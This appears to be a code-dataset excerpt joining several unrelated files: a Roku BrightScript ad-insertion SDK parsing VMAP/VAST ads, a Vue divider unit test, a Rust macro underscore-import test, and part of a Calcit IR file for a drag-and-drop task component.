brkTimeKey = brkBegin.tostr()
timeToEvtMap[brkTimeKey] = [m.sdk.AdEvent.POD_START]
timeToBreakMap[brkTimeKey] = adBreak
adRenderTime = adBreak.renderTime
for each rAd in adBreak.ads
hasCompleteEvent = false
for each evt in rAd.tracking
if invalid <> evt["time"]
timeKey = int(evt.time).tostr()
m.addEventToEvtMap(timeToEvtMap, timeKey, evt.event)
if m.sdk.AdEvent.COMPLETE = evt.event
hasCompleteEvent = true
end if
end if
end for
adRenderTime = adRenderTime + rAd.duration
if not hasCompleteEvent and 0 < rAd.tracking.count() and 0 < rAd.duration
timeKey = int(adRenderTime - 0.5).tostr()
m.addEventToEvtMap(timeToEvtMap, timeKey, m.sdk.AdEvent.COMPLETE)
end if
end for
brkEnd = int(adBreak.renderTime+adBreak.duration)
timeKey = brkEnd.tostr()
m.appendBreakEnd(timeToEvtMap, timeKey)
timeToBeginEnd.push({"begin":brkBegin, "end":brkEnd, "renderSequence":adBreak.renderSequence})
end for
if not timeToEvtMap.isEmpty()
m.adTimeToEventMap = timeToEvtMap
m.lastEvents = {}
end if
if not timeToBreakMap.isEmpty() then m.adTimeToBreakMap = timeToBreakMap
if 0 < timeToBeginEnd.count() then
timeToBeginEnd.sortby("begin")
m.adTimeToBeginEnd = timeToBeginEnd
end if
end function
strmMgr.appendBreakEnd = function(timeToEvtMap as object, timeKey as string) as object
if timeToEvtMap[timeKey] = invalid
timeToEvtMap[timeKey] = [m.sdk.AdEvent.POD_END]
else
timeToEvtMap[timeKey].push(m.sdk.AdEvent.POD_END)
end if
return timeToEvtMap
end function
strmMgr.findBreak = function(possec as float) as object
snapbrk = invalid
if invalid = m.adTimeToBeginEnd then return snapbrk
for each brk in m.adTimeToBeginEnd
if brk.begin <= possec and possec <= brk.end
snapbrk = brk
exit for
end if
if possec < brk.end then exit for
end for
return snapbrk
end function
strmMgr.onSeekSnap = function(seekRequest as object) as double
if invalid = m.adTimeToBeginEnd then return seekRequest.time
if m.sdk.SnapTo.NEXTPOD = seekRequest.snapto
for each brk in m.adTimeToBeginEnd
if seekRequest.time < brk.begin then
exit for
else if m.crrntPosSec <= brk.begin and brk.begin <= seekRequest.time
snap2begin = brk.begin - 1
if snap2begin < 0 then snap2begin = 0
return snap2begin
end if
end for
else
snapbrk = m.findBreak(seekRequest.time)
if snapbrk = invalid then return seekRequest.time
snap2begin = snapbrk.begin - 1
if snap2begin < 0 then snap2begin = 0
if "postroll" = snapbrk.renderSequence then return snap2begin
if m.sdk.SnapTo.BEGIN = seekRequest.snapto
return snap2begin
else if m.sdk.SnapTo.END = seekRequest.snapto
return snapbrk.end + 1
end if
end if
return seekRequest.time
end function
strmMgr.onPosition = function(msg as object) as Void
m.sdk.log(["onPosition() msg position: ",msg.getData().tostr()], 89)
if m.currentAdBreak = invalid or m.currentAdBreak.duration = invalid
return
end if
posSec = msg.getData()
if 0 <= m.whenAdBreakStart and m.whenAdBreakStart + m.currentAdBreak.duration + 2 < posSec
m.cleanupAdBreakInfo(false)
end if
end function
strmMgr.onMessageVOD = function(msg as object, curAd as object) as Void
posSec = msg.getData()
if posSec = m.crrntPosSec or posSec = m.lastPosSec
return
end if
m.lastPosSec = m.crrntPosSec
m.crrntPosSec = posSec
if m.crrntPosSec <> m.lastPosSec + 1
m.handlePosition(posSec - 1, curAd)
end if
m.handlePosition(posSec, curAd)
end function
strmMgr.handlePosition = function(sec as integer, curAd as object) as Void
if m.adTimeToEventMap <> invalid
timeKey = sec.tostr()
if m.adTimeToEventMap[timeKey] <> invalid
for each adEvent in m.adTimeToEventMap[timeKey]
if adEvent <> invalid
m.handleAdEvent(adEvent, sec, curAd)
end if
end for
end if
end if
end function
strmMgr.fillAdBreakInfo = function(sec as integer, curAd as object) as Void
m.whenAdBreakStart = sec
if invalid <> m.adTimeToBreakMap
adBreak = m.adTimeToBreakMap[sec.tostr()]
if invalid <> adBreak
m.currentAdBreak = adBreak
end if
end if
end function
strmMgr.updateAdBreakEvents = function(adBreak as object, triggered as boolean) as void
adBreak.viewed = triggered
for each ad in adBreak.ads
for each evnt in ad.tracking
evnt.triggered = triggered
end for
end for
for each evnt in adBreak.tracking
evnt.triggered = triggered
end for
end function
strmMgr.cleanupAdBreakInfo = function(triggered=false as boolean) as void
if m.currentAdBreak <> invalid
m.updateAdBreakEvents(m.currentAdBreak, triggered)
end if
m.whenAdBreakStart = -1
m.currentAdBreak = invalid
m.lastEvents = {}
end function
strmMgr.deinit = function() as void
m.adTimeToEventMap = invalid
m.adTimeToBreakMap = invalid
m.adTimeToBeginEnd = invalid
m.currentAdBreak = invalid
m.crrntPosSec = -1
m.lastPosSec = -1
m.whenAdBreakStart = -1
end function
strmMgr.handleAdEvent = function(adEvent as string, sec as integer, curAd as object) as Void
if adEvent = m.sdk.AdEvent.POD_START
m.fillAdBreakInfo(sec, curAd)
if m.lastEvents[adEvent] <> sec
m.lastEvents = {}
end if
else
if invalid = m.currentAdBreak
ab = m.findBreak(sec)
if invalid <> ab
pastSec = ab.begin
while pastsec < sec
m.handlePosition(pastSec, curAd)
pastSec += 1
end while
end if
end if
end if
if m.lastEvents[adEvent] <> sec
adInfo = {position:sec, event:adEvent}
if adEvent = m.sdk.AdEvent.POD_START then adInfo["adPod"] = m.currentAdBreak
m.sdk.eventCallbacks.doCall(adEvent, adInfo)
m.lastEvents[adEvent] = sec
end if
end function
strmMgr.pastLastAdBreak = function(posSec as integer) as boolean
return invalid = m.adTimeToBeginEnd or m.adTimeToBeginEnd.peek()["end"] < posSec
end function
strmMgr.cancelPod = function (curAd as object) as object
ret = {canceled: false}
if invalid <> m.currentAdBreak and 0 < m.crrntPosSec
ab = m.currentAdBreak
if not m.isInteractive(curAd)
shortdur = (m.crrntPosSec-1) - ab.renderTime
if 0 < shortdur
ab.duration = shortdur
m.cleanupAdBreakInfo(true)
ret["canceled"] = true
end if
end if
end if
return ret
end function
strmMgr.isInteractive = function(curAd as object) as boolean
if invalid <> curAd and invalid <> curAd["adindex"] and invalid <> m.currentAdBreak
ad = m.currentAdBreak.ads[curAd["adindex"] - 1]
strmFmt = ad["streamFormat"]
return "iroll" = strmFmt or "brightline" = left(strmFmt,10)
end if
return false
end function
daisdk["streamManager"] = strmMgr
daisdk.setCertificate = function(certificateRef as string) as Void
m.certificate = certificateRef
end function
daisdk.getCertificate = function() as string
if m.certificate = invalid
return "common:/certs/ca-bundle.crt"
end if
return m.certificate
end function
daisdk.getMsgType = function(msg as object, player as object) as integer
nodeId = player.sgnode.id
if "roSGNodeEvent" = type(msg)
xg = msg.getField()
if nodeId = msg.getNode()
if xg = "position"
return m.msgType.POSITION
else if xg.left(13) = "timedMetaData"
return m.msgType.METADATA
else if xg = "state"
if msg.getData() = "finished"
return m.msgType.FINISHED
end if
end if
else
if xg = "keypressed"
return m.msgType.KEYEVENT
end if
end if
end if
return m.msgType.UNKNOWN
end function
daisdk.createUrlXfer = function(ishttps as boolean) as object
xfer = createObject("roUrlTransfer")
if ishttps
xfer.setCertificatesfile(m.getCertificate())
xfer.initClientCertificates()
end if
xfer.addHeader("Accept-Language", m.locale.Accept_Language)
xfer.addHeader("Content-Language", m.locale.Content_Language)
return xfer
end function
daisdk.setTrackingTime = function(timeOffset as float, rAd as object) as void
duration = rAd.duration
for each evt in rAd.tracking
if evt.event = m.AdEvent.IMPRESSION
evt.time = 0.0 + timeOffset
else if evt.event = m.AdEvent.FIRST_QUARTILE
evt.time = duration * 0.25 + timeOffset
else if evt.event = m.AdEvent.MIDPOINT
evt.time = duration * 0.5 + timeOffset
else if evt.event = m.AdEvent.THIRD_QUARTILE
evt.time = duration * 0.75 + timeOffset
else if evt.event = m.AdEvent.COMPLETE
evt.time = duration + timeOffset
end if
end for
end function
daisdk.getValidStr = function(obj as object) as string
if invalid <> obj and invalid <> getInterface(obj, "ifString")
return obj.trim()
else
return ""
end if
end function
daisdk.httpsRegex = createObject("roRegEx", "^https", "")
daisdk.getRokuAds = function() as object
return roku_ads()
end function
daisdk.logToRAF = function(btype as string, obj as object) as object
m.getRokuAds().util.fireBeacon(btype, obj)
end function
daisdk.createDAIObject = function(objName as string) as object
if type(m[objName]) = "roAssociativeArray"
m[objName]["sdk"] = m
end if
return m[objName]
end function
daisdk.updateLocale = function()
m.locale.Content_Language = createObject("roDeviceInfo").getCurrentLocale().replace("_","-")
end function
daisdk.ErrorEvent = {
ERROR : "0",
COULD_NOT_LOAD_STREAM: "1000",
STREAM_API_KEY_NOT_VALID: "1002",
BAD_STREAM_REQUEST: "1003"
INVALID_RESPONSE: "1004"
}
daisdk.AdEvent = {
PODS: "PodsFound"
POD_START: "PodStart"
START: "Start",
IMPRESSION: "Impression",
CREATIVE_VIEW: "creativeView",
FIRST_QUARTILE: "FirstQuartile",
MIDPOINT: "Midpoint",
THIRD_QUARTILE: "ThirdQuartile",
COMPLETE: "Complete",
POD_END: "PodComplete",
STREAM_END: "StreamEnd",
ACCEPT_INVITATION: "AcceptInvitation",
ERROR: "Error"
}
daisdk.msgType = {
UNKNOWN: 0,
POSITION: 1,
METADATA: 2,
FINISHED: 3,
KEYEVENT: 4,
}
daisdk.version = {
ver: "0.1.0"
}
daisdk.locale = {
Accept_Language: "en-US,en-GB,es-ES,fr-CA,de-DE",
Content_Language: "en-US"
}
daisdk.StreamType = {
LIVE: "live",
VOD: "vod"
}
daisdk.SnapTo = {
NEXTPOD: "nextpod",
BEGIN: "begin",
END: "end"
}
daisdk.CreateError = function() as object
ERROR = createObject("roAssociativeArray")
ERROR.id = ""
ERROR.info = ""
ERROR.type = "error"
return ERROR
end function
daisdk.log = function(x, logLevel=-1 as integer) as void
if logLevel < m.logLevel
dtm = ["SDK (", createObject("roDateTime").toISOString().split("T")[1], "): "].join("")
if "roArray" = type(x)
print dtm; x.join("")
else
print dtm; x
end if
end if
end function
getglobalaa()["callFunctionInGlobalNamespace"] = function(dd as function, ue as object) as Void
dd(ue)
end function
return daisdk
end function
function RAFX_getOnceUXPlugin(params as dynamic) as Object
rafxssai = RAFX_getSSAIPluginBase(params)
impl = rafxssai["impl"]
impl.onceuxToRAFEvent = {
"impressions" : rafxssai.AdEvent.IMPRESSION
"firstquartiles" : rafxssai.AdEvent.FIRST_QUARTILE
"midpoints" : rafxssai.AdEvent.MIDPOINT
"thirdquartiles" : rafxssai.AdEvent.THIRD_QUARTILE
"completes" : rafxssai.AdEvent.COMPLETE
}
impl.requestPreplay = function(requestObj as object) as object
if invalid = m.loader
m.loader = m.createLoader(requestObj.type)
end if
xmlstr = m.loader.requestPreplay(requestObj)
if invalid <> xmlstr and "" <> xmlstr
m.sdk.log(["requestPreplay() xml:",xmlstr], 9)
parser = m.sdk.createOUXParser()
vmapxml = parser.strToXml(xmlstr)
if invalid = vmapxml
print "requestPreplay() invalid xml:";xmlstr
return {error:"invalid xml"}
end if
m.prplyInfo = {vmapxml:vmapxml, parser:parser, strmType: requestObj.type}
else
print "requestPreplay() empty xml response"
m.prplyInfo = {}
return {error:"empty response"}
end if
return invalid
end function
impl.getStreamInfo = function() as object
if invalid <> m.prplyInfo["uoInfo"]
return m.prplyInfo.uoInfo
else if invalid <> m.prplyInfo and invalid <> m.prplyInfo["vmapxml"] and invalid <> m.prplyInfo["parser"]
m.prplyInfo["uoInfo"] = m.prplyInfo.parser.parseExtensions(m.prplyInfo.vmapxml)
return m.prplyInfo.uoInfo
end if
return {}
end function
impl.parsePrplyInfo = function() as object
adBreaks = []
adOpportunities = 0
if invalid <> m.prplyInfo and invalid <> m.prplyInfo["vmapxml"] and invalid <> m.prplyInfo["parser"]
adBreaks = m.prplyInfo.parser.parseAdBreaks(m.prplyInfo.vmapxml)
else
m.sdk.log("parsePrplyInfo() NO valid prplyInfo")
end if
for each ab in adBreaks
adOpportunities += ab.ads.count()
duration = 0
for each ad in ab.ads
m.sdk.setTrackingTime(ab.renderTime+duration, ad)
duration += ad.duration
end for
if 0 = ab.duration
ab.duration = duration
end if
end for
return {adOpportunities:adOpportunities, adBreaks:adBreaks}
end function
rafxssai.createOUXParser = function() as object
obj = m.createDAIObject("OUXParser")
obj.getValidStr = m.getValidStr
return obj
end function
ouxparser = {}
ouxparser.strToXml = function(vmapstr as string) as object
vmapxml = createObject("roXmlElement")
if vmapstr = invalid or not vmapxml.parse(vmapstr) then
return invalid
end if
m.sdk.log("vmapstr: "+vmapstr, 10)
return vmapxml
end function
ouxparser.parseAdBreaks = function(vmapxml as object) as object
adBreaks = []
if vmapxml = invalid
return adBreaks
end if
for each abxml in vmapxml.getNamedElementsCi("vmap:AdBreak")
adBreak = {
viewed: false,
renderTime: 0.0,
renderSequcne: "",
duration: 0.0,
tracking: [],
slots: 0,
ads: []
}
m.parseAdBreak(abxml, adBreak)
if 0 < adBreak.ads.count() then
if 0 < adBreaks.count() and adBreak["renderTime"] = adBreaks.peek()["renderTime"]
lastBreak = adBreaks.peek()
lastBreak.tracking.append(adBreak.tracking)
lastBreak.ads.append(adBreak.ads)
else
adBreaks.push(adBreak)
end if
end if
end for
return adBreaks
end function
ouxparser.parseExtensions = function(vmapxml as object) as object
uoInfo = {
content: {
contenturi: ""
contenttype: ""
contentlength: 0
payloadlength: 0
ttl: 0
}
tracking: []
parameters: {}
}
extensions = vmapxml.getNamedElementsCi("vmap:Extensions")[0]
if invalid = extensions
return uoInfo
end if
for each elm in extensions.getChildElements()
elmName = elm.getName()
if "uo:contentImpressions" = elmName
for each impelm in elm.getNamedElements("uo:Impression")
url = m.getValidStr(impelm@url)
if "" <> url
uoInfo.tracking.push({event: "Impression", url:url})
end if
end for
else if "uo:unicornOnce" = elmName
uoInfo.contenturi = m.getValidStr(elm@contenturi)
uoInfo.contenttype = m.getValidStr(elm@contenttype)
cl = m.getValidStr(elm@contentlength)
if "" <> cl
uoInfo.contentlength = cl.toInt()
end if
pl = m.getValidStr(elm@payloadlength)
if "" <> pl
uoInfo.payloadlength = pl.toInt()
end if
ttl = m.getValidStr(elm@ttl)
if "" <> ttl
uoInfo.ttl = ttl.toInt()
end if
else if "uo:requestParameters" = elmName
for each uoparam in elm.getNamedElements("uo:parameter")
key = m.getValidStr(uoparam@key)
val = m.getValidStr(uoparam@value)
if invalid <> key and invalid <> val
uoInfo.parameters[key] = val
end if
end for
end if
end for
return uoInfo
end function
ouxparser.VASTToRAFMap = {
"start" : "Impression"
"defaultimpression" : "Impression"
"impression" : "Impression"
"creativeview" : "Impression"
"firstquartile" : "FirstQuartile"
"midpoint" : "Midpoint"
"thirdquartile" : "ThirdQuartile"
"complete" : "Complete"
"_mute" : "Mute"
"mute" : "Mute"
"_un-mute" : "Unmute"
"unmute" : "Unmute"
"_pause" : "Pause"
"pause" : "Pause"
"_resume" : "Resume"
"resume" : "Resume"
"_rewind" : "Rewind"
"_close" : "Close"
"close" : "Close"
"closelinear" : "Close"
"skip" : "Skip"
"error" : "Error"
"acceptinvitation" : "AcceptInvitation"
"acceptinvitationlinear" : "AcceptInvitation"
"breakstart" : "PodStart"
"slotimpression" : "PodStart"
"slotend" : "PodComplete"
"breakend" : "PodComplete"
}
ouxparser.parseTracking = function(trckxml as object, adBreak as object) as void
evt = m.getValidStr(trckxml@event)
if "" = evt then return
evt = m.VASTToRAFMap[evt]
url = m.getValidStr(trckxml.getText())
if invalid <> evt
adBreak.tracking.push({event: evt, url:url, triggered:false})
end if
end function
ouxparser.secfloat = createObject("roRegEx", "[0-9]{2}(?:[.][0-9]{1,3})?", "")
ouxparser.parseTimeString = function(hhmmss as string, defaultsec = 0.0 as float) as float
seconds = defaultsec
f = hhmmss.tokenize(":")
if 3 <= f.count()
seconds = f[0].toInt()*3600 + f[1].toInt()*60
secm = m.secfloat.match(f[2])
if invalid <> secm and 0 < secm.count() then
seconds += secm[0].tofloat()
end if
end if
return seconds
end function
ouxparser.parseTimeOffset = function(abxml as object, adBreak as object) as void
timeOffset = m.getValidStr(abxml@timeoffset)
if timeOffset = "start"
adBreak.renderSequence = "preroll"
else if timeOffset = "end"
adBreak.renderSequence = "postroll"
else
adBreak.renderSequence = "midroll"
adBreak.renderTime = m.parseTimeString(timeOffset)
end if
end function
ouxparser.parseAdBreak = function(abxml as object, adBreak as object) as void
trackingEvents = abxml.getNamedElements("vmap:TrackingEvents")
if invalid <> trackingEvents[0]
for each trckxml in trackingEvents[0].getNamedElements("vmap:Tracking")
m.parseTracking(trckxml, adBreak)
end for
end if
m.parseTimeOffset(abxml, adBreak)
asxml = abxml.getNamedElements("vmap:AdSource")[0]
if invalid <> asxml
vdata = asxml.getNamedElements("vmap:VASTAdData")[0]
if invalid = vdata
vdata = asxml.getNamedElements("vmap:VASTData")[0]
end if
if invalid <> vdata
vstxml = vdata.getNamedElements("VAST")[0]
if invalid <> vstxml
ads = m.parseVAST(vstxml)
if 0 < ads.count()
adBreak.ads = ads
end if
end if
end if
end if
end function
ouxparser.parseVAST = function(vstxml as object) as object
ads = []
for each adxml in vstxml.getNamedElementsCi("ad")
ad = m.parseAd(adxml)
if invalid <> ad and (0 < ad.duration or 0 < ad.tracking.count())
ads.push(ad)
end if
end for
return ads
end function
ouxparser.parseAd = function(adxml as object) as object
rAd = {
duration: 0,
streamFormat: "",
adServer: "",
streams: [],
tracking: []
}
if invalid <> adxml@id then rAd["adid"] = adxml@id
for each elm in adxml.getNamedElementsCi("inline")
m.parseChildren(elm, rAd, "ad")
end for
return rAd
end function
ouxparser.addImpressionUrl = function(xml as object, rAd as object) as Void
url = m.getValidStr(xml.getText())
if "" <> url
rAd.tracking.push({event: "Impression", url:url, triggered:false})
end if
end function
ouxparser.parseAdTitle = function(xml as object, rAd as object) as Void
rAd.title = m.getValidStr(xml.getText())
end function
ouxparser.addErrorUrl = function(xml as object, rAd as object) as Void
url = m.getValidStr(xml.getText())
if "" <> url
rAd.tracking.push({event: "Error", url:url, triggered:false})
end if
end function
ouxparser.parseCreatives = function(xml as object, rAd as object) as Void
for each elm in xml.getNamedElementsCi("creative")
m.parseCreative(elm, rAd)
end for
end function
ouxparser.parseCreative = function(xml as object, rAd as object) as Void
for each elm in xml.getNamedElementsCi("linear")
m.parseChildren(elm, rAd, "creative")
end for
apiFramework = m.getValidStr(xml@apiFramework)
if "brightline" = apiFramework.left(10)
for each elm in xml.getNamedElementsCi("companionads")
for each elm in xml.getNamedElementsCi("companion")
m.parseCompanion(elm, rAd, apiFramework)
end for
end for
end if
end function
ouxparser.parseDuration = function(xml as object, rAd as object) as Void
dur = m.getValidStr(xml.getText())
if "" <> dur
rAd.duration = m.parseTimeString(dur)
end if
end function
ouxparser.parseTrackingEvents = function(xml as object, rAd as object) as Void
for each elm in xml.getNamedElementsCi("tracking")
m.parseTracking(elm, rAd)
end for
end function
ouxparser.parseVideoClicks = function(xml as object, rAd as object) as void
clickthrough = xml.ClickThrough[0]
if invalid <> clickthrough
url = m.getValidStr(clickthrough.getText())
if "" <> url
rAd.clickThrough = url
end if
end if
end function
ouxparser.parseMediaFiles = function(xml as object, rAd as object) as Void
for each elm in xml.getNamedElementsCi("mediafile")
m.parseMediaFile(elm, rAd)
end for
end function
ouxparser.parseMediaFile = function(xml as object, rAd as object) as Void
apiFramework = LCase(m.getValidStr(xml@apiFramework))
if "innovid" <> apiFramework then return
mimeType = m.getValidStr(xml@type)
if "application/json" <> mimeType then return
url = m.getValidStr(xml.getText())
if "" = url then return
stream = {
url : url
width : m.getValidStr(xml@width).toInt()
height : m.getValidStr(xml@height).toInt()
provider : apiFramework
mimeType : mimeType
}
rAd.streams.push(stream)
rAd.streamFormat = "iroll"
end function
ouxparser.parseCompanion = function(xml as object, rAd as object, apiFrameworkOfCreative as string) as Void
companion = {url:invalid, mimeType:invalid, tracking:[], provider:apiFrameworkOfCreative}
m.parseChildren(xml, companion, "companion")
if invalid <> companion.url
apiFramework = m.getValidStr(xml@apiFramework)
if "" <> apiFramework
companion["provider"] = apiFramework
end if
companion["width"] = m.getValidStr(xml@width).toInt()
companion["height"] = m.getValidStr(xml@height).toInt()
rAd.companionAds.push(companion)
rAd.streams = [{url:""}]
end if
end function
ouxparser.parseStaticResource = function(xml as object, obj as object) as Void
mimeType = m.getValidStr(xml@creativeType)
if "application/json" = mimeType
url = m.getValidStr(xml.getText())
if "" <> url
obj.mimeType = mimeType
obj.url = url
end if
end if
end function
ouxparser.parseCompanionClickThrough = function(xml as object, obj as object) as void
url = m.getValidStr(xml.getText())
if "" <> url
obj.clickThrough = url
end if
end function
ouxparser.parseChildren = function(xml as object, rAd as object, tagName as string) as Void
if xml.getChildElements() = invalid then
return
end if
for each elm in xml.getChildElements()
elmName = lcase(elm.getname())
if lcase(tagName) = "ad"
if elmName = "impression"
m.addImpressionUrl(elm, rAd)
else if elmName = "creatives"
m.parseCreatives(elm, rAd)
else if elmName = "error"
m.addErrorUrl(elm, rAd)
else if elmName = "adtitle"
m.parseAdTitle(elm, rAd)
end if
else if lcase(tagName) = "creative"
if elmName = "duration"
m.parseDuration(elm, rAd)
else if elmName = "trackingevents"
m.parseTrackingEvents(elm, rAd)
else if elmName = "videoclicks"
m.parseVideoClicks(elm, rAd)
else if elmName = "mediafiles"
m.parseMediaFiles(elm, rAd)
end if
else if lcase(tagName) = "companion"
if elmName = "staticresource"
m.parseStaticResource(elm, rAd)
else if elmName = "companionclickthrough"
m.parseCompanionClickThrough(elm, rAd)
else if elmName = "trackingevents"
m.parseTrackingEvents(elm, rAd)
end if
end if
end for
end function
rafxssai["OUXParser"] = ouxparser
return rafxssai
end function
function RAFX_SSAI(params as object) as object
if invalid <> params and invalid <> params["name"]
p = RAFX_getOnceUXPlugin(params)
p["__version__"] = "0b.42.8"
p["__name__"] = params["name"]
return p
end if
end function
| Brightscript | 5 | khangh/samples | advertising/rsgoux/lib/rafxssai.brs | [
"MIT"
] |
import { createVue, destroyVM } from '../util';
describe('Divider', () => {
let vm;
afterEach(() => {
destroyVM(vm);
});
it('content', () => {
vm = createVue({
template: `
<el-divider>我是一条完美分割线!</el-divider>
`
});
expect(vm.$el).to.property('textContent').to.include('我是一条完美分割线!');
});
it('direction', () => {
vm = createVue({
template: `
<el-divider direction="vertical">我是一条完美分割线!</el-divider>
`
});
expect(vm.$el.className).to.include('el-divider--vertical');
});
it('apply class to divider', () => {
vm = createVue({
template: `
<el-divider direction="vertical" class="my-divider">我是一条完美分割线!</el-divider>
`
});
expect(vm.$el.className).to.include('my-divider');
});
});
| JavaScript | 4 | jackwiy/element | test/unit/specs/divider.spec.js | [
"MIT"
] |
// Check that macro expanded underscore imports behave as expected
// check-pass
#![feature(decl_macro, rustc_attrs)]
mod x {
pub use std::ops::Not as _;
}
macro m() {
mod w {
mod y {
pub use std::ops::Deref as _;
}
use crate::x::*;
use self::y::*;
use std::ops::DerefMut as _;
fn f() {
false.not();
(&()).deref();
(&mut ()).deref_mut();
}
}
}
#[rustc_macro_transparency = "transparent"]
macro n() {
mod z {
pub use std::ops::Deref as _;
}
use crate::x::*;
use crate::z::*;
use std::ops::DerefMut as _;
fn f() {
false.not();
(&()).deref();
(&mut ()).deref_mut();
}
}
m!();
n!();
fn main() {}
| Rust | 4 | Eric-Arellano/rust | src/test/ui/underscore-imports/macro-expanded.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
{}
:users $ {}
|root $ {} (:avatar nil) (:name |root) (:nickname |root) (:id |root) (:theme :star-trail) (:password |d41d8cd98f00b204e9800998ecf8427e)
|Qr5ffqtY $ {} (:avatar nil) (:name |chen) (:nickname |chen) (:id |Qr5ffqtY) (:theme :star-trail) (:password |d41d8cd98f00b204e9800998ecf8427e)
:ir $ {} (:package |app)
:files $ {}
|app.comp.task $ {}
:defs $ {}
|comp-task $ {}
:data $ {}
|T $ {} (:text |defcomp) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SJ2WZcq9J0HZ)
|j $ {} (:text |comp-task) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SyaWWcq9JCrZ)
|r $ {}
:data $ {}
|T $ {} (:text |task) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1JMWq55JAHW)
|j $ {} (:text |idx) (:type :leaf) (:at 1500452996813) (:by |root) (:id |H1xfbcq51CrW)
|r $ {} (:text |focused?) (:type :leaf) (:at 1500452996813) (:by |root) (:id |SJ-M-c9q1Rrb)
|v $ {} (:text |dragging-id) (:type :leaf) (:at 1518620618638) (:by |root) (:id |SJAz01jIG)
|x $ {} (:text |dropping-id) (:type :leaf) (:at 1519749533570) (:by |root) (:id |SkziFbQuM)
:type :expr
:at 1500452996813
:by nil
:id |HyRbW5ccyArZ
|v $ {}
:data $ {}
|T $ {} (:text |div) (:type :leaf) (:at 1500452996813) (:by |root) (:id |BJNzb5551CHZ)
|j $ {}
:data $ {}
|wT $ {}
:data $ {}
|T $ {} (:text |:on-dragenter) (:type :leaf) (:at 1519749471665) (:by |root) (:id |H1efvYW7ufleaf)
|j $ {}
:data $ {}
|D $ {} (:text |fn) (:type :leaf) (:at 1629052125518) (:by |Qr5ffqtY)
|L $ {}
:data $ {}
|T $ {} (:text |e) (:type :leaf) (:at 1629052126048) (:by |Qr5ffqtY)
|j $ {} (:text |d!) (:type :leaf) (:at 1629052126797) (:by |Qr5ffqtY)
:type :expr
:at 1629052125869
:by |Qr5ffqtY
|T $ {}
:data $ {}
|T $ {} (:text |d!) (:type :leaf) (:at 1629052121859) (:by |Qr5ffqtY) (:id |rJb_PFW7uG)
|j $ {} (:text |:mark/dropping) (:type :leaf) (:at 1519749480470) (:by |root) (:id |HkTDF-QdG)
|r $ {}
:data $ {}
|T $ {} (:text |:id) (:type :leaf) (:at 1519749482701) (:by |root) (:id |H1W_YZXdG)
|j $ {} (:text |task) (:type :leaf) (:at 1519749483216) (:by |root) (:id |BJeX_F-XOG)
:type :expr
:at 1519749481605
:by |root
:id |ByMOYbQOz
:type :expr
:at 1519749472662
:by |root
:id |SJKDK-mdG
:type :expr
:at 1629052122430
:by |Qr5ffqtY
:type :expr
:at 1519749465916
:by |root
:id |H1efvYW7uf
|T $ {} (:text |{}) (:type :leaf) (:at 1500452996813) (:by |root) (:id |rJUz-959JAB-)
|j $ {}
:data $ {}
|T $ {} (:text |:style) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HJ_fWc9cyCHW)
|j $ {}
:data $ {}
|xL $ {}
:data $ {}
|T $ {} (:text |if) (:type :leaf) (:at 1518169630555) (:by |root) (:id |rkxLX01oIfleaf)
|j $ {}
:data $ {}
|T $ {} (:text |=) (:type :leaf) (:at 1518620625929) (:by |root) (:id |r1xv7Akj8z)
|j $ {} (:text |dropping-id) (:type :leaf) (:at 1519749515996) (:by |root) (:id |rkiAyAZDf)
|r $ {}
:data $ {}
|T $ {} (:text |:id) (:type :leaf) (:at 1518620629205) (:by |root) (:id |B1xnRk0Wwf)
|j $ {} (:text |task) (:type :leaf) (:at 1518620629776) (:by |root) (:id |SJG6AkCZPG)
:type :expr
:at 1518620628802
:by |root
:id |S1TCkC-wG
:type :expr
:at 1518620626404
:by |root
:id |Bkx90kRZPM
|r $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1518169632690) (:by |root) (:id |rkuXCyjLz)
|r $ {}
:data $ {}
|T $ {} (:text |:opacity) (:type :leaf) (:at 1519748430385) (:by |root) (:id |HJZN8BWmOGleaf)
|j $ {} (:text |0.7) (:type :leaf) (:at 1519749583520) (:by |root) (:id |BkD8SZ7dG)
:type :expr
:at 1519748428375
:by |root
:id |HJZN8BWmOG
:type :expr
:at 1518169632333
:by |root
:id |SyeuXAyoIG
:type :expr
:at 1518169630165
:by |root
:id |r1lYct-7uG
|yj $ {}
:data $ {}
|T $ {} (:text |if) (:type :leaf) (:at 1518169630555) (:by |root) (:id |rkxLX01oIfleaf)
|j $ {}
:data $ {}
|T $ {} (:text |=) (:type :leaf) (:at 1518620625929) (:by |root) (:id |r1xv7Akj8z)
|j $ {} (:text |dragging-id) (:type :leaf) (:at 1518620628010) (:by |root) (:id |rkiAyAZDf)
|r $ {}
:data $ {}
|T $ {} (:text |:id) (:type :leaf) (:at 1518620629205) (:by |root) (:id |B1xnRk0Wwf)
|j $ {} (:text |task) (:type :leaf) (:at 1518620629776) (:by |root) (:id |SJG6AkCZPG)
:type :expr
:at 1518620628802
:by |root
:id |S1TCkC-wG
:type :expr
:at 1518620626404
:by |root
:id |Bkx90kRZPM
|r $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1518169632690) (:by |root) (:id |rkuXCyjLz)
|j $ {}
:data $ {}
|T $ {} (:text |:z-index) (:type :leaf) (:at 1519747278418) (:by |root) (:id |rJQRgb7dz)
|j $ {} (:text |999) (:type :leaf) (:at 1519747279223) (:by |root) (:id |HJPAlW7_M)
:type :expr
:at 1519747275669
:by |root
:id |HyNCe-Q_z
|r $ {}
:data $ {}
|T $ {} (:text |:opacity) (:type :leaf) (:at 1519748430385) (:by |root) (:id |HJZN8BWmOGleaf)
|j $ {} (:text |0.4) (:type :leaf) (:at 1519749585340) (:by |root) (:id |BkD8SZ7dG)
:type :expr
:at 1519748428375
:by |root
:id |HJZN8BWmOG
:type :expr
:at 1518169632333
:by |root
:id |SyeuXAyoIG
:type :expr
:at 1518169630165
:by |root
:id |rkxLX01oIf
|T $ {} (:text |merge) (:type :leaf) (:at 1500452996813) (:by |root) (:id |ry5zZcqcJRBb)
|j $ {} (:text |ui/row) (:type :leaf) (:at 1500452996813) (:by |root) (:id |S1ozZ9c91AH-)
|r $ {} (:text |style-task) (:type :leaf) (:at 1500452996813) (:by |root) (:id |HJ2zZ559yCrZ)
|v $ {}
:data $ {}
|T $ {} (:text |{}) (:type :leaf) (:at 1500452996813) (:by |root) (:id |B1CG-q5cJ0HZ)
|j $ {}
:data $ {}
